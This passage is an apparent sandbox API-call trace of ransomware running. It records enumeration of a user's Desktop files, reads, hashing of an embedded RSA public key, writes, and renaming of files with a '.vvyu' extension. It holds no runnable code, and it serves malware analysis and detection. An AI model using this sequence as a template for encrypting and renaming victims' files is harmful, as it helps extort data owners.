lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0192.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0192.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0192.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0192.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0192.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0192.419] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0xab84, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0xab84, lpOverlapped=0x0) returned 1 [0192.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0192.420] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xab89, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.420] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0192.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0192.420] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0192.420] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e8 [0192.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0192.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0192.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0192.421] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0192.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.422] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.422] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0192.422] CloseHandle (hObject=0x584) returned 1 [0192.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0192.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af3f88 [0192.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0192.424] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\Qia7.bmp" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\qia7.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\Qia7.bmp.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\qia7.bmp.vvyu")) returned 1 [0192.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0192.425] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x345758 | out: hHeap=0x2c0000) returned 1 [0192.428] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45f368f0, ftCreationTime.dwHighDateTime=0x1d8971f, ftLastAccessTime.dwLowDateTime=0x78c93f70, ftLastAccessTime.dwHighDateTime=0x1d8a6a1, ftLastWriteTime.dwLowDateTime=0x78c93f70, ftLastWriteTime.dwHighDateTime=0x1d8a6a1, nFileSizeHigh=0x0, nFileSizeLow=0xfc74, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YZ4wuGCPKPt9a.pps", cAlternateFileName="YZ4WUG~1.PPS")) returned 1 [0192.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x345758 [0192.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.429] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\YZ4wuGCPKPt9a.pps") returned=".pps" [0192.429] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\YZ4wuGCPKPt9a.pps" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\yz4wugcpkpt9a.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0192.430] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=64628) returned 1 [0192.430] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0192.434] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xfc4e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.434] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0192.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0192.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0192.439] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.439] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xfc74, lpOverlapped=0x0) returned 1 [0192.440] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0192.440] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.440] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.440] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0192.441] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0192.443] CryptHashData (hHash=0x2a05e28, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.443] CryptGetHashParam (in: hHash=0x2a05e28, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0192.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0192.443] CryptGetHashParam (in: hHash=0x2a05e28, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0192.443] GetLastError () returned 0x0 [0192.443] CryptDestroyHash (hHash=0x2a05e28) returned 1 [0192.443] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0192.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0192.444] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0192.444] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0192.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0192.444] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0192.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0192.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0192.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xfc70) returned 0x2af5168 [0192.445] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0192.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0192.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0192.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e8 [0192.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0192.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c60 [0192.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6170 [0192.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3b28 [0192.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6188 [0192.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61b8 [0192.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6218 [0192.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61d0 [0192.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0192.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0192.446] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0192.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0192.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61b8 | out: hHeap=0x2c0000) returned 1 [0192.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61d0 | out: hHeap=0x2c0000) returned 1 [0192.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6218 | out: hHeap=0x2c0000) returned 1 [0192.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0192.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6218 [0192.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0192.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae61d0 [0192.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0192.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae61b8 [0192.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0192.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0192.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0192.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0192.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0192.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0192.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0192.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0192.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61d0 | out: hHeap=0x2c0000) returned 1 [0192.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0192.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61b8 | out: hHeap=0x2c0000) returned 1 [0192.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0192.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0192.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6218 | out: hHeap=0x2c0000) returned 1 [0192.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0192.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0192.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0192.449] GetCurrentThreadId () returned 0x5d8 [0192.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0192.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae73c8 [0192.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0192.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0192.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0192.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0192.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0192.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0192.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.450] GetCurrentThreadId () returned 0x5d8 [0192.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0192.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0192.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0192.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40478 [0192.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0192.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0192.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0192.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6218 [0192.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0192.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0192.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0192.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0192.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0192.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0192.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0192.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0192.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61b8 [0192.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0192.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0192.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0192.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0192.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0192.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0192.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0192.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae61d0 [0192.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0192.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0192.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0192.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61a0 [0192.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0192.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6230 [0192.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0192.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0192.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0192.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6200 [0192.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0192.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61e8 [0192.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0192.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6248 [0192.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61e8 | out: hHeap=0x2c0000) returned 1 [0192.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae61e8 [0192.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6200 | out: hHeap=0x2c0000) returned 1 [0192.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0192.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0192.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0192.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0192.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0192.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61b8 | out: hHeap=0x2c0000) returned 1 [0192.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae61b8 [0192.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0192.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8e0 [0192.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6218 | out: hHeap=0x2c0000) returned 1 [0192.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0192.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6248 | out: hHeap=0x2c0000) returned 1 [0192.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0192.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0192.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0192.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0192.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0192.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61b8 | out: hHeap=0x2c0000) returned 1 [0192.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0192.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0192.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0192.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0192.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0192.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0192.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0192.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0192.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0192.456] HeapFree (in: hHeap=0x2c0000, 